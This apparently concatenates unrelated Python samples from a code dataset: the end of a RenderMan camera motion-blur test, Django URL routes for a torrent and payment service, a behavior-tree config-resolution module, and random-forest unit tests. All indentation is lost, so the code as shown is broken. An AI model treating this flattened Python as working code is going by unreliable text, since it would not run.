with IECore.WorldBlock( r ) :
IECore.MeshPrimitive.createPlane( IECore.Box2f( IECore.V2f( -0.1 ), IECore.V2f( 0.1 ) ) ).render( r )
# check that something appears in the output image
i = IECore.Reader.create( "test/IECoreRI/output/testCamera.tif" ).read()
e = IECore.PrimitiveEvaluator.create( i )
result = e.createResult()
e.pointAtUV( IECore.V2f( 0.5, 0.5 ), result )
self.assertTrue( result.floatPrimVar( e.A() ) > 0 ) # something should be there
self.assertTrue( result.floatPrimVar( e.A() ) < 1 ) # but it should be blurry
def testMotionBlurCameraRib( self ) :
r = IECoreRI.Renderer( "test/IECoreRI/output/testCamera.rib" )
with IECore.TransformBlock( r ) :
with IECore.MotionBlock( r, [ 0, 1 ] ) :
r.concatTransform( IECore.M44f.createTranslated( IECore.V3f( -0.2, 0, 1 ) ) )
r.concatTransform( IECore.M44f.createTranslated( IECore.V3f( 0.2, 0, 1 ) ) )
r.camera( "main", { "shutter" : IECore.V2f( 0, 1 ) } )
r.worldBegin()
r.worldEnd()
l = "".join( file( "test/IECoreRI/output/testCamera.rib" ).readlines() )
self.assert_( "MotionBegin [ 0 1 ]" in l )
if __name__ == "__main__":
unittest.main()
| StarcoderdataPython |
1614350 | from django.urls import path
from .views import (GenPubAddrView, TorrentFileView, BypassPaymentReceivedView, PaymentReceivedView, Pdp2ActivationStatusView, TorrentFileInfoView,
PaymentView, PubAddrsListView, SendPdp2Data, ChangePubKey, WalletNotificationView,
BlockNotificationView, TxnsView, TorrentFileFromTxid, TorrentUuidFromTxid)
urlpatterns = [
# Generate public key address
path('new-payment-address/',
GenPubAddrView.as_view()),
# Get all payment addresses
path('payment-addresses/',
PubAddrsListView.as_view()
),
# download the torrent
path('get-torrent/',
TorrentFileView.as_view()),
path('get-torrent/<str:torrent_uuid>/',
TorrentFileView.as_view()),
# get the information about the torrent
path('get-torrent-info/',
TorrentFileInfoView.as_view()),
path('get-torrent-info/<uuid:torrent_uuid>/',
TorrentFileInfoView.as_view()),
path('get-torrent-via-txid/<str:txid>/',
TorrentFileFromTxid.as_view()),
path('get-torrent-info-via-txid/<str:txid>/',
TorrentUuidFromTxid.as_view()),
path('payment-received/',
PaymentReceivedView.as_view()),
path('bypass-payment-received/',
BypassPaymentReceivedView.as_view()),
path('payment/', PaymentView.as_view()),
path('get-txns/', TxnsView.as_view()),
# Status of pdp2 profile
path('pdp2-activation-status/',
Pdp2ActivationStatusView.as_view()),
# Allows the user to change the status of their pdp2 profile
path('pdp2-activation-status/<str:requested_change>/',
Pdp2ActivationStatusView.as_view()),
# Allows a staff member to change the status of a user's pdp2 profile
# TODO should the pub_key_addr be a uuid???
path('pdp2-activation-status/<str:requested_change>/<uuid:pub_key_addr>/',
Pdp2ActivationStatusView.as_view()),
# Sends Pdp2 profile data to a pub_key address
path('send/', SendPdp2Data.as_view()),
# Change the public key that the data is encrypted with
path('change-store-pub-key/', ChangePubKey.as_view()),
path('wallet-notification/', WalletNotificationView.as_view()),
path('block-notification/', BlockNotificationView.as_view())
]
| StarcoderdataPython |
3386737 | <reponame>duskforge/nodzz
"""Configuration management tools.
While ``nodzz`` have the instruments to implement, manage and configure any
behavior tree via pure Python API, this is of course not the most convenient
way to manage behavior trees based projects. ``nodzz`` provides config based
behavior tree management tools which allow completely separate tree graph
design and nodes configuring from each particular node Python implementation.
Here are the core concepts of ``nodzz`` configuration:
Component.
Component is a ``nodzz`` project atomic building block (like node
or some connector, for example).
In the ``nodzz`` configuration tools component is represented by unique name
which identifies it among all other components and its config. From here on,
the ter "component name" and the term "config name" will mean the same.
Component config is a JSON-serializable mapping data structure which can
exist both in the form of ``JSONDict`` (JSON-serializable dict) and in the
form of ``pydantic`` based ``ConfigModelBase`` config which in turn can be
one-to-one converted from or to the ``JSONDict`` representation. Please refer
``ConfigModelBase`` class documentation for more info.
Each component config must have one (and only one) of two fields initialised:
``class_name`` or ``component_name``.
* ``class_name`` is a full import path to the python class which implements
the component and which is initialized with the config. Import path should
should locate component class in current Python environment and has format
like ``nodzz.nodes.controllers.SequenceNode``. If ``class_name`` is initialised,
component config should provide all necessary parameters for the component
correct work.
* ``component_name`` is a reference to the name of some other ``nodzz`` component
(referenced component) in the configuration namespace. In this case referenced
config will be merged to the initial config: all uninitialized fields in the
initial component config will be automatically filled by corresponding values
from the referenced component config. This process is called "config resolution".
Also the component being referenced can itself have a reference to another
component. In such case config resolution process covers all configs chain.
This feature implements some kind of inheritance among the components configs
and encourages components reuse.
Config set.
Config set as a logical entity is a set (surprise!) of component configs that
exist in the same namespace. This allows to identify and access all component
configs by their names. Config set implemented in the config set entity.
"""
# TODO: Some of the docstrings parts should be moved to docs.
# TODO: Implement config dirs loading.
from pathlib import Path
from typing import Optional, List, Dict, Any
from pydantic import BaseModel
from nodzz.basic_types import JSONDict
from nodzz.utils import load_file
class ConfigSet:
"""Component configs management entity.
``ConfigSet`` is a container for component configs, loaded from external sources
like files or databases. It provides instruments for configs access, management
and validation. ``ConfigSet`` serves as a library of component configs. All configs
required for any behavior initialisation tree should be contained in one instance
of ``ConfigSet``.
"""
def __init__(self) -> None:
self._meta_configs = {}
def add_config(self, name: str, config: JSONDict, source: str = 'undefined', update: bool = False) -> None:
"""Adds component config to the config set.
Adds component config and its metadata to the config set, validates and
optionally resolves config.
Args:
name: Config name.
config: Component config in JSON-serializable dict format.
source: Config source ID, used for config source identification in case
of config management problems.
update: Boolean flag controlling the behavior when config with already
existing name is being added. If value is ``True``, existing config will
be replaced by the new one. If value is ``False``, exception will be raised.
Default value is ``False``.
"""
class_name = config.get('class_name')
ref_name = config.get('component_name')
if class_name and ref_name:
raise ValueError(f'Both class_name and component_name are defined in config: {name}(source: {source})')
elif not class_name and not ref_name:
raise ValueError(f'Both class_name and component_name are not defined in config: {name} (source: {source})')
if name in self._meta_configs and not update:
raise ValueError(f'Trying to add config with already existing name: {name}, '
f'new config source: {source}, '
f'existing config source: {self._meta_configs[name]["source"]}')
# TODO: Now is assigning used only for debug mode. Remove when name/module configuration will be implemented.
config['name'] = name
self._meta_configs[name] = {
'config': config,
'source': source
}
def get_config(self, name: str) -> Optional[JSONDict]:
"""Returns config from the config set by its name.
Args:
name: Config name.
Returns:
JSONDict component config if config with given name exists in
config set, else ``None``.
"""
meta_config = self._meta_configs.get(name)
result = meta_config['config'] if meta_config else None
return result
def del_config(self, name: str) -> None:
"""Deletes config from the config set by its name.
Args:
name: Config name.
"""
self._meta_configs.pop(name, None)
def _resolve_config(self, name: str, config: JSONDict, source: str, chain: Optional[List[str]] = None) -> JSONDict:
"""Resolves component config.
Recursively resolves all configs in reference chain of given config (including
given config itself). References are looked among already loaded to the config
set configs.
Args:
name: Config name.
config: Component config in JSON-serializable dict format.
source Config source ID, used for config source identification in case
of config management problems.
chain: List which accumulates non-resolved config names in the method
recursive calls cycle. Used for the cyclic references detection in
the component configs.
Returns:
Dict containing all resolved configs from the reference chain of given
config. Keys are config names and values are corresponding configs. Empty
dict is returned when no config was resolved.
"""
result = {}
ref_name = config.get('component_name')
if ref_name:
ref_meta_config = self._meta_configs.get(ref_name)
if ref_meta_config is None:
raise ValueError(f'Component {name} (source: {source}) refers to the absent component {ref_name}')
chain = chain or []
if ref_name in chain:
error_message = 'Cyclic reference among component configs: '
for _name in chain:
_ref_name = self._meta_configs[_name]['config']['component_name']
_source = self._meta_configs[_name]['source']
info_str = f'\n\tname: {_name}, refers to: {_ref_name}, source: {_source}'
info_str = f'\n{info_str}' if _name == ref_name else info_str
error_message = f'{error_message}{info_str}'
info_str = f'\n\tname: {name}, refers to: {ref_name}, source: {source}'
error_message = f'{error_message}{info_str}'
raise ValueError(f'Cyclic reference among components:\n{error_message}')
ref_config = ref_meta_config['config']
ref_ref_name = ref_config.get('component_name')
if ref_ref_name:
chain.append(name)
ref_source = ref_meta_config['source']
result = self._resolve_config(ref_name, ref_config, ref_source, chain)
ref_config = result[ref_name]
resolved_config = {k: v for k, v in ref_config.items()}
resolved_config.update(**config)
resolved_config.pop('component_name')
result[name] = resolved_config
return result
def resolve_configs(self) -> None:
"""Prepares all config set configs for components initialisation.
"Flattens" config set structure: resolves all references between
configs by setting field values which are absent in config with
corresponding field values from referenced config.
"""
for name, meta_config in self._meta_configs.items():
config = meta_config['config']
source = meta_config['source']
resolved_configs = self._resolve_config(name=name, config=config, source=source)
for config_name, resolved_config in resolved_configs.items():
self._meta_configs[config_name]['config'] = resolved_config
class _ConfigFileModel(BaseModel):
"""Config file validation model."""
__root__: Dict[str, Dict[str, Any]]
def load_config_file(file_path: Path) -> ConfigSet:
"""Loads component configs from single JSON/YAML file and initialises ``ConfigSet`` entity.
File should contain dict as a root element where keys are config names and
values are configs.
Args:
file_path: ``pathlib`` object with configuration file path.
Returns:
``ConfigSet`` instance with resolved configs loaded from file.
"""
config_dict = load_file(file_path)
_ConfigFileModel.parse_obj(config_dict)
config_set = ConfigSet()
file_path_str = str(file_path)
for name, config in config_dict.items():
config_set.add_config(name=name, config=config, source=file_path_str)
config_set.resolve_configs()
return config_set
| StarcoderdataPython |
1676571 | <filename>smooth_rf/tests/test_pytorch_prep.py
import numpy as np
import pandas as pd
import scipy.sparse
import sparse
import sklearn
from sklearn.ensemble import RandomForestRegressor
from collections import Counter
import sys, os
import smooth_rf
def test_create_Gamma_eta_tree_more_regression():
"""
test for create_Gamma_eta_tree_more, regression tree - standard depth only
Both static and random tests (random tests are more relative to structure
than exact answers)
"""
# random - structure output check
# data creation
n = 200
min_size_leaf = 1
X = np.random.uniform(size = (n, 510), low = -1,high = 1)
y = 10 * np.sin(np.pi * X[:,0]*X[:,1]) + 20 * ( X[:,2] - .5)**2 +\
10 * X[:,3] + 5 * X[:,4] + np.random.normal(size = n)
rf_class = sklearn.ensemble.RandomForestRegressor(n_estimators = 2,
min_samples_leaf = min_size_leaf)
random_forest = rf_class.fit(X = X,
y = y.ravel())
tree = random_forest.estimators_[0]
max_depth_range = np.max(smooth_rf.depth_per_node(tree)) + 1
G, n, ln, ld, li = smooth_rf.create_Gamma_eta_tree_more(tree)
assert G.shape == (np.sum(tree.tree_.children_left == -1),
max_depth_range), \
"Gamma returned does not have the correct shape"
assert n.shape == G.shape, \
"eta returned does not have the correct shape"
assert np.all(n >= 0), \
"eta returned has negative values"
assert np.all(n[:,0] ==
tree.tree_.weighted_n_node_samples[tree.tree_.children_left == -1]),\
"eta structure doesn't match up with number of observes per leaf"
# new tests
assert ln.shape[0] == G.shape[0] and ld.shape[0] == G.shape[0] and \
li.shape[0] == G.shape[0], \
"leaf based outputs should have same number of leaves and Gamma"
assert np.all(np.ceil(ln) == ln) and np.all(ln > 0), \
"leaf counts should be strictly positive and integers"
assert np.all(ln ==
tree.tree_.weighted_n_node_samples[tree.tree_.children_left == -1]), \
"number of obs in each leaf not matching tree structure"
assert np.all(np.ceil(ld) == ld) and np.all(ld >= 0), \
"leaf depth should be positive and integers"
assert np.all(li >= - 1e-10), \
"leaf impurity (mse) should be non-negative"
# static check
# tree structure:
# ~upper: left, lower: right~
# num obs depth
# |--1 10 1
# -0-| 34 0
# | |--3 9 2
# |-2-| 24 1
# | |--5 8 3
# |-4-| 15 2
# |--6 7 3
# eta
# (1) 10 | 24 | 0 | 0
# (3) 9 | 15 | 10 | 0
# (5) 8 | 7 | 9 | 10
# (6) 7 | 8 | 9 | 10
# Gamma
# (1) 10 | 18+24+28 = 70 | 0 | 0
# (3) 9 * 2 = 18 | 24+28 = 52 | 10 | 0
# (5) 8 * 3 = 24 | 28 | 18 | 10
# (6) 7 * 4 = 28 | 24 | 18 | 10
# WHEN parent == True
# eta
# (1) 10 | 10+24 = 34 | 34+0 = 34 | 34+0 = 34
# (3) 9 | 15+9 = 24 | 24+10 = 34 | 34+0 = 34
# (5) 8 | 8+7 = 15 | 15+9 = 24 | 24+10 = 34
# (6) 7 | 8+7 = 15 | 15+9 = 24 | 24+10 = 34
# Gamma
# (1) 10 | 10+(18+24+28) = 80 | 80+0 = 80 | 80+0 = 80
# (3) 9 * 2 = 18 | 18+(24+28) = 70 | 70+10 = 80 | 80+0 = 80
# (5) 8 * 3 = 24 | 24+28 = 52 | 52+18 = 70 | 70+10 = 80
# (6) 7 * 4 = 28 | 28+24 = 52 | 52+18 = 70 | 70+10 = 80
class inner_fake_tree():
def __init__(self, nn, cl, cr, v):
self.weighted_n_node_samples = nn
self.children_left = cl
self.children_right = cr
self.value = v
self.impurity = np.zeros(v.shape[0]) # this isn't a good test
class fake_tree():
def __init__(self, nn, cl, cr, v):
self.tree_ = inner_fake_tree(nn, cl, cr, v)
self.__class__ = sklearn.tree.tree.DecisionTreeRegressor
weighted_n_node_samples = np.array([34,10,24,9,15,8,7], dtype = np.int)
children_left = np.array([2,-1,4,-1,6,-1,-1], dtype = np.int)
children_right = np.array([1,-1,3,-1,5,-1,-1], dtype = np.int)
value = np.array([-99, 1, -99, 2, -99, 3, 4]).reshape((-1,1,1))
test = fake_tree(weighted_n_node_samples,
children_left,
children_right,
value)
n_leaf = 4
g_static, n_static, ln_static, ld_static, li_static = \
smooth_rf.create_Gamma_eta_tree_more(test)
n_expected = np.array([[10,24,0,0],
[9,15,10,0],
[8,7,9,10],
[7,8,9,10]])
g_expected = np.array([[10,70,0,0],
[18,52,10,0],
[24,28,18,10],
[28,24,18,10]])
ln_expected = n_expected[:,0]
ld_expected = np.array([1,2,3,3])
assert np.all(g_static == g_expected), \
"static test's Gamma failed to reproduce correct solutions"
assert np.all(n_static == n_expected), \
"static test's eta failed to reproduce correct solutions"
assert np.all(ln_static == ln_expected), \
"static test's leaf count failed to reproduce correct solutions"
assert np.all(ld_static == ld_expected), \
"static test's leaf depth failed to reproduce correct solutions"
# WHEN parent == true
g_static, n_static, ln_static, ld_static, li_static = \
smooth_rf.create_Gamma_eta_tree_more(test, parents_all=True)
n_expected = np.array([[10,34,34,34],
[9,24,34,34],
[8,15,24,34],
[7,15,24,34]])
g_expected = np.array([[10,80,80,80],
[18,70,80,80],
[24,52,70,80],
[28,52,70,80]])
ln_expected = n_expected[:,0]
ld_expected = np.array([1,2,3,3])
assert np.all(g_static == g_expected), \
"static test's Gamma failed to reproduce correct solutions, " +\
"parent = True"
assert np.all(n_static == n_expected), \
"static test's eta failed to reproduce correct solutions, " +\
"parent = True"
assert np.all(ln_static == ln_expected), \
"static test's leaf count failed to reproduce correct solutions, " +\
"parent = True"
assert np.all(ld_static == ld_expected), \
"static test's leaf depth failed to reproduce correct solutions, " +\
"parent = True"
def test_create_Gamma_eta_tree_more_classification():
"""
test for create_Gamma_eta_tree_more, class - standard depth only
Both static and random tests (random tests are more relative to structure
than exact answers)
"""
# random - structure output check
# data creation
n = 200
min_size_leaf = 1
X = np.random.uniform(size = (n, 510), low = -1,high = 1)
y = 10 * np.sin(np.pi * X[:,0]*X[:,1]) + 20 * ( X[:,2] - .5)**2 +\
10 * X[:,3] + 5 * X[:,4] + np.random.normal(size = n)
y_cat = np.array(
pd.cut(y, bins = 5, labels = np.arange(5, dtype = np.int)),
dtype = np.int)
y = y_cat
num_classes = len(Counter(y_cat).keys())
rf_class = sklearn.ensemble.RandomForestClassifier(n_estimators = 2,
min_samples_leaf = min_size_leaf)
random_forest = rf_class.fit(X = X,
y = y.ravel())
tree = random_forest.estimators_[0]
max_depth_range = np.max(smooth_rf.depth_per_node(tree)) + 1
G, n, ln, ld, li = smooth_rf.create_Gamma_eta_tree_more(tree)
assert G.shape == (num_classes,
np.sum(tree.tree_.children_left == -1),
max_depth_range), \
"Gamma returned does not have the correct shape"
assert n.shape == G.shape[1:3], \
"eta returned does not have the correct shape"
assert np.all(n >= 0), \
"eta returned has negative values"
assert np.all(n[:,0] ==
tree.tree_.weighted_n_node_samples[tree.tree_.children_left == -1]),\
"eta structure doesn't match up with number of observes per leaf"
# new tests
assert ln.shape[0] == G.shape[1] and ld.shape[0] == G.shape[1] and \
li.shape[0] == G.shape[1], \
"leaf based outputs should have same number of leaves and Gamma"
assert np.all(np.ceil(ln) == ln) and np.all(ln > 0), \
"leaf counts should be strictly positive and integers"
assert np.all(ln ==
tree.tree_.weighted_n_node_samples[tree.tree_.children_left == -1]), \
"number of obs in each leaf not matching tree structure"
assert np.all(np.ceil(ld) == ld) and np.all(ld >= 0), \
"leaf depth should be positive and integers"
# static check
# tree structure:
# ~upper: left, lower: right~
# num obs class 1 class 2 depth
# |--1 10 5 5 1
# -0-| 34 21 13 0
# | |--3 9 9 0 2
# |-2-| 24 16 8 1
# | |--5 8 7 1 3
# |-4-| 15 7 8 2
# |--6 7 0 7 3
# eta
# (1) 10 | 24 | 0 | 0
# (3) 9 | 15 | 10 | 0
# (5) 8 | 7 | 9 | 10
# (6) 7 | 8 | 9 | 10
# Gamma (class 1)
# (1) 5 | 9+7 = 16| 0 | 0
# (3) 9 | 7 | 5 | 0
# (5) 7 | 0 | 9 | 5
# (6) 0 | 7 | 9 | 5
# Gamma (class 2)
# (1) 5 | 1+7 = 8| 0 | 0
# (3) 0 | 8 | 5 | 0
# (5) 1 | 7 | 0 | 5
# (6) 7 | 1 | 0 | 5
def gini(vec):
p = vec / vec.sum()
return p.T @ (1-p)
class inner_fake_tree():
def __init__(self, nn, cl, cr, v):
self.weighted_n_node_samples = nn
self.children_left = cl
self.children_right = cr
self.value = v
self.impurity = np.array([gini(v[i,:,:].ravel()) for i in range(v.shape[0])])
class fake_tree():
def __init__(self, nn, cl, cr, v):
self.tree_ = inner_fake_tree(nn, cl, cr, v)
self.__class__ = sklearn.tree.tree.DecisionTreeClassifier
weighted_n_node_samples = np.array([34,10,24,9,15,8,7], dtype = np.int)
children_left = np.array([2,-1,4,-1,6,-1,-1], dtype = np.int)
children_right = np.array([1,-1,3,-1,5,-1,-1], dtype = np.int)
value = np.array([[21, 13],
[5, 5],
[16, 8],
[9, 0],
[7, 8],
[7, 1],
[0, 7]], dtype = np.float).reshape((-1,1,2))
test = fake_tree(weighted_n_node_samples,
children_left,
children_right,
value)
n_leaf = 4
g_static, n_static, ln_static, ld_static, li_static = \
smooth_rf.create_Gamma_eta_tree_more(test)
n_expected = np.array([[10,24,0,0],
[9,15,10,0],
[8,7,9,10],
[7,8,9,10]])
g_expected = np.array([[[5,16,0,0],
[9,7,5,0],
[7,0,9,5],
[0,7,9,5]],
[[5,8,0,0],
[0,8,5,0],
[1,7,0,5],
[7,1,0,5]]])
ln_expected = np.array([10,9,8,7])
ld_expected = np.array([1,2,3,3])
li_expected = np.array([gini(value[i,:,:].ravel()) for i in range(value.shape[0])])[np.array([1,3,5,6])]
assert np.all(g_static == g_expected), \
"static test's Gamma failed to reproduce correct solutions"
assert np.all(n_static == n_expected), \
"static test's eta failed to reproduce correct solutions"
assert np.all(ln_static == ln_expected), \
"static test's leaf count failed to reproduce correct solutions"
assert np.all(ld_static == ld_expected), \
"static test's leaf depth failed to reproduce correct solutions"
assert np.all(li_static == li_expected), \
"static test's leaf impurity failed to reproduce correct solutions"
def test_create_Gamma_eta_tree_more_per_regression():
"""
test for create_Gamma_eta_tree_more_per, reg tree - standard depth only
Both static and random tests (random tests are more relative to structure
than exact answers)
"""
# random - structure output check
# data creation
n = 200
min_size_leaf = 1
X = np.random.uniform(size = (n, 510), low = -1,high = 1)
y = 10 * np.sin(np.pi * X[:,0]*X[:,1]) + 20 * ( X[:,2] - .5)**2 +\
10 * X[:,3] + 5 * X[:,4] + np.random.normal(size = n)
rf_class = sklearn.ensemble.RandomForestRegressor(n_estimators = 2,
min_samples_leaf = min_size_leaf)
random_forest = rf_class.fit(X = X,
y = y.ravel())
tree = random_forest.estimators_[0]
max_depth_range = np.max(smooth_rf.depth_per_node(tree)) + 1
G, n, ln, ld, li, fd, fi = smooth_rf.create_Gamma_eta_tree_more_per(tree)
assert G.shape == (np.sum(tree.tree_.children_left == -1),
max_depth_range), \
"Gamma returned does not have the correct shape"
assert n.shape == G.shape, \
"eta returned does not have the correct shape"
assert np.all(n >= 0), \
"eta returned has negative values"
assert np.all(n[:,0] ==
tree.tree_.weighted_n_node_samples[tree.tree_.children_left == -1]),\
"eta structure doesn't match up with number of observes per leaf"
# new tests (ln,ld,li)
assert ln.shape[0] == G.shape[0] and ld.shape[0] == G.shape[0] and \
li.shape[0] == G.shape[0], \
"leaf based outputs should have same number of leaves and Gamma"
assert np.all(np.ceil(ln) == ln) and np.all(ln > 0), \
"leaf counts should be strictly positive and integers"
assert np.all(ln ==
tree.tree_.weighted_n_node_samples[tree.tree_.children_left == -1]), \
"number of obs in each leaf not matching tree structure"
assert np.all(np.ceil(ld) == ld) and np.all(ld >= 0), \
"leaf depth should be positive and integers"
assert np.all(li >= - 1e-10), \
"leaf impurity (mse) should be non-negative"
# newest tests (fd, fi)
assert fd.shape == G.shape and fi.shape == G.shape, \
"shapes of full depth and impurity should make shape of Gamma"
assert np.all(fd[:,0] == ld) and np.all(np.ceil(fd) == fd) and \
np.all(fd >= 0), \
"full depth shape should mirror leaf depth structure"
assert np.all(fi[:,0] == li) and np.all(fi >= - 1e-10), \
"full impurity (mse) should mirror leaf impurity structure"
# for c_idx in range(fi.shape[1] - 1):
# assert np.all(fi[:,c_idx] - fi[:,c_idx + 1] <= 1e-10), \
# "impurity should be increasing (mse)"
# static check
# tree structure:
# ~upper: left, lower: right~
# num obs depth
# |--1 10 1
# -0-| 34 0
# | |--3 9 2
# |-2-| 24 1
# | |--5 8 3
# |-4-| 15 2
# |--6 7 3
# eta
# (1) 10 | 24 | 0 | 0
# (3) 9 | 15 | 10 | 0
# (5) 8 | 7 | 9 | 10
# (6) 7 | 8 | 9 | 10
# Gamma
# (1) 10 | 18+24+28 = 70 | 0 | 0
# (3) 9 * 2 = 18 | 24+28 = 52 | 10 | 0
# (5) 8 * 3 = 24 | 28 | 18 | 10
# (6) 7 * 4 = 28 | 24 | 18 | 10
class inner_fake_tree():
def __init__(self, nn, cl, cr, v):
self.weighted_n_node_samples = nn
self.children_left = cl
self.children_right = cr
self.value = v
self.impurity = np.zeros(v.shape[0]) # this isn't a good test
class fake_tree():
def __init__(self, nn, cl, cr, v):
self.tree_ = inner_fake_tree(nn, cl, cr, v)
self.__class__ = sklearn.tree.tree.DecisionTreeRegressor
weighted_n_node_samples = np.array([34,10,24,9,15,8,7], dtype = np.int)
children_left = np.array([2,-1,4,-1,6,-1,-1], dtype = np.int)
children_right = np.array([1,-1,3,-1,5,-1,-1], dtype = np.int)
value = np.array([-99, 1, -99, 2, -99, 3, 4]).reshape((-1,1,1))
test = fake_tree(weighted_n_node_samples,
children_left,
children_right,
value)
n_leaf = 4
g_static, n_static, ln_static, ld_static, li_static, \
fd_static, fi_static = \
smooth_rf.create_Gamma_eta_tree_more_per(test)
n_expected = np.array([[10,24,0,0],
[9,15,10,0],
[8,7,9,10],
[7,8,9,10]])
g_expected = np.array([[10,70,0,0],
[18,52,10,0],
[24,28,18,10],
[28,24,18,10]])
ln_expected = n_expected[:,0]
ld_expected = np.array([1,2,3,3])
fd_expected = np.array([[1,0,0,0],
[2,1,0,0],
[3,2,1,0],
[3,2,1,0]])
assert np.all(g_static == g_expected), \
"static test's Gamma failed to reproduce correct solutions"
assert np.all(n_static == n_expected), \
"static test's eta failed to reproduce correct solutions"
assert np.all(ln_static == ln_expected), \
"static test's leaf count failed to reproduce correct solutions"
assert np.all(ld_static == ld_expected), \
"static test's leaf depth failed to reproduce correct solutions"
assert np.all(fd_static == fd_expected), \
"static test's full depth failed to reproduce correct solutions"
def test_create_Gamma_eta_tree_more_per_classification():
"""
test for create_Gamma_eta_tree_more, class tree - standard depth only
Both static and random tests (random tests are more relative to structure
than exact answers)
"""
# random - structure output check
# data creation
n = 200
min_size_leaf = 1
X = np.random.uniform(size = (n, 510), low = -1,high = 1)
y = 10 * np.sin(np.pi * X[:,0]*X[:,1]) + 20 * ( X[:,2] - .5)**2 +\
10 * X[:,3] + 5 * X[:,4] + np.random.normal(size = n)
y_cat = np.array(
pd.cut(y, bins = 5, labels = np.arange(5, dtype = np.int)),
dtype = np.int)
y = y_cat
num_classes = len(Counter(y_cat).keys())
rf_class = sklearn.ensemble.RandomForestClassifier(n_estimators = 2,
min_samples_leaf = min_size_leaf)
random_forest = rf_class.fit(X = X,
y = y.ravel())
tree = random_forest.estimators_[0]
max_depth_range = np.max(smooth_rf.depth_per_node(tree)) + 1
G, n, ln, ld, li, fd, fi = smooth_rf.create_Gamma_eta_tree_more_per(tree)
assert G.shape == (num_classes,
np.sum(tree.tree_.children_left == -1),
max_depth_range), \
"Gamma returned does not have the correct shape"
assert n.shape == G.shape[1:3], \
"eta returned does not have the correct shape"
assert np.all(n >= 0), \
"eta returned has negative values"
assert np.all(n[:,0] ==
tree.tree_.weighted_n_node_samples[tree.tree_.children_left == -1]),\
"eta structure doesn't match up with number of observes per leaf"
# new tests
assert ln.shape[0] == G.shape[1] and ld.shape[0] == G.shape[1] and \
li.shape[0] == G.shape[1], \
"leaf based outputs should have same number of leaves and Gamma"
assert np.all(np.ceil(ln) == ln) and np.all(ln > 0), \
"leaf counts should be strictly positive and integers"
assert np.all(ln ==
tree.tree_.weighted_n_node_samples[tree.tree_.children_left == -1]), \
"number of obs in each leaf not matching tree structure"
assert np.all(np.ceil(ld) == ld) and np.all(ld >= 0), \
"leaf depth should be positive and integers"
# newest tests (fd, fi)
assert fd.shape == G.shape[1:] and fi.shape == G.shape[1:], \
"shapes of full depth and impurity should make shape of Gamma"
assert np.all(fd[:,0] == ld) and np.all(np.ceil(fd) == fd) and \
np.all(fd >= 0), \
"full depth shape should mirror leaf depth structure"
assert np.all(fi[:,0] == li), \
"full impurity (gini) should mirror leaf impurity structure"
# static check
# tree structure:
# ~upper: left, lower: right~
# num obs class 1 class 2 depth
# |--1 10 5 5 1
# -0-| 34 21 13 0
# | |--3 9 9 0 2
# |-2-| 24 16 8 1
# | |--5 8 7 1 3
# |-4-| 15 7 8 2
# |--6 7 0 7 3
# eta
# (1) 10 | 24 | 0 | 0
# (3) 9 | 15 | 10 | 0
# (5) 8 | 7 | 9 | 10
# (6) 7 | 8 | 9 | 10
# Gamma (class 1)
# (1) 5 | 9+7 = 16| 0 | 0
# (3) 9 | 7 | 5 | 0
# (5) 7 | 0 | 9 | 5
# (6) 0 | 7 | 9 | 5
# Gamma (class 2)
# (1) 5 | 1+7 = 8| 0 | 0
# (3) 0 | 8 | 5 | 0
# (5) 1 | 7 | 0 | 5
# (6) 7 | 1 | 0 | 5
def gini(vec):
p = vec / vec.sum()
return p.T @ (1-p)
class inner_fake_tree():
def __init__(self, nn, cl, cr, v):
self.weighted_n_node_samples = nn
self.children_left = cl
self.children_right = cr
self.value = v
self.impurity = np.array([gini(v[i,:,:].ravel()) for i in range(v.shape[0])])
class fake_tree():
def __init__(self, nn, cl, cr, v):
self.tree_ = inner_fake_tree(nn, cl, cr, v)
self.__class__ = sklearn.tree.tree.DecisionTreeClassifier
weighted_n_node_samples = np.array([34,10,24,9,15,8,7], dtype = np.int)
children_left = np.array([2,-1,4,-1,6,-1,-1], dtype = np.int)
children_right = np.array([1,-1,3,-1,5,-1,-1], dtype = np.int)
value = np.array([[21, 13],
[5, 5],
[16, 8],
[9, 0],
[7, 8],
[7, 1],
[0, 7]], dtype = np.float).reshape((-1,1,2))
test = fake_tree(weighted_n_node_samples,
children_left,
children_right,
value)
n_leaf = 4
g_static, n_static, ln_static, ld_static, li_static, \
fd_static, fi_static = \
smooth_rf.create_Gamma_eta_tree_more_per(test)
n_expected = np.array([[10,24,0,0],
[9,15,10,0],
[8,7,9,10],
[7,8,9,10]])
g_expected = np.array([[[5,16,0,0],
[9,7,5,0],
[7,0,9,5],
[0,7,9,5]],
[[5,8,0,0],
[0,8,5,0],
[1,7,0,5],
[7,1,0,5]]])
ln_expected = np.array([10,9,8,7])
ld_expected = np.array([1,2,3,3])
fd_expected = np.array([[1,0,0,0],
[2,1,0,0],
[3,2,1,0],
[3,2,1,0]])
li_expected = np.array([gini(value[i,:,:].ravel()) for i in range(value.shape[0])])[np.array([1,3,5,6])]
li_expected2 = np.array([gini(value[i,:,:].ravel()) for i in range(value.shape[0])])[np.array([0,2,4,4])]
li_expected3 = np.array([gini(value[i,:,:].ravel()) for i in range(value.shape[0])])[np.array([0,0,2,2])]
li_expected4 = np.array([gini(value[i,:,:].ravel()) for i in range(value.shape[0])])[np.array([0,0,0,0])]
fi_expected = np.array([li_expected,li_expected2,li_expected3,li_expected4],
).T
assert np.all(g_static == g_expected), \
"static test's Gamma failed to reproduce correct solutions"
assert np.all(n_static == n_expected), \
"static test's eta failed to reproduce correct solutions"
assert np.all(ln_static == ln_expected), \
"static test's leaf count failed to reproduce correct solutions"
assert np.all(ld_static == ld_expected), \
"static test's leaf depth failed to reproduce correct solutions"
assert np.all(li_static == li_expected), \
"static test's leaf impurity failed to reproduce correct solutions"
assert np.all(fd_static == fd_expected), \
"static test's full depth failed to reproduce correct solutions"
assert np.all(fi_static == fi_expected), \
"static test's full impurity failed to reproduce correct solutions"
def test_depth_per_node_plus_parent():
"""
test depth_per_node_plus_parent on random forest tree
Tests for:
1) depth_per_node function makes sure all children are 1 (and only 1) level
deeper
2) structure relative to parent_mat
"""
# data creation
X_train = np.concatenate(
(np.random.normal(loc = (1,2), scale = .6, size = (100,2)),
np.random.normal(loc = (-1.2, -.5), scale = .6, size = (100,2))),
axis = 0)
y_train = np.concatenate((np.zeros(100, dtype = np.int),
np.ones(100, dtype = np.int)))
amount = np.int(200)
s = 20
c = y_train[:amount]
# creating a random forest
rf_class_known = sklearn.ensemble.RandomForestClassifier(
n_estimators = 1,
min_samples_leaf = 1)
fit_rf_known = rf_class_known.fit(X = np.array(X_train)[:amount,:],
y = y_train[:amount].ravel())
forest = fit_rf_known.estimators_
tree = forest[0]
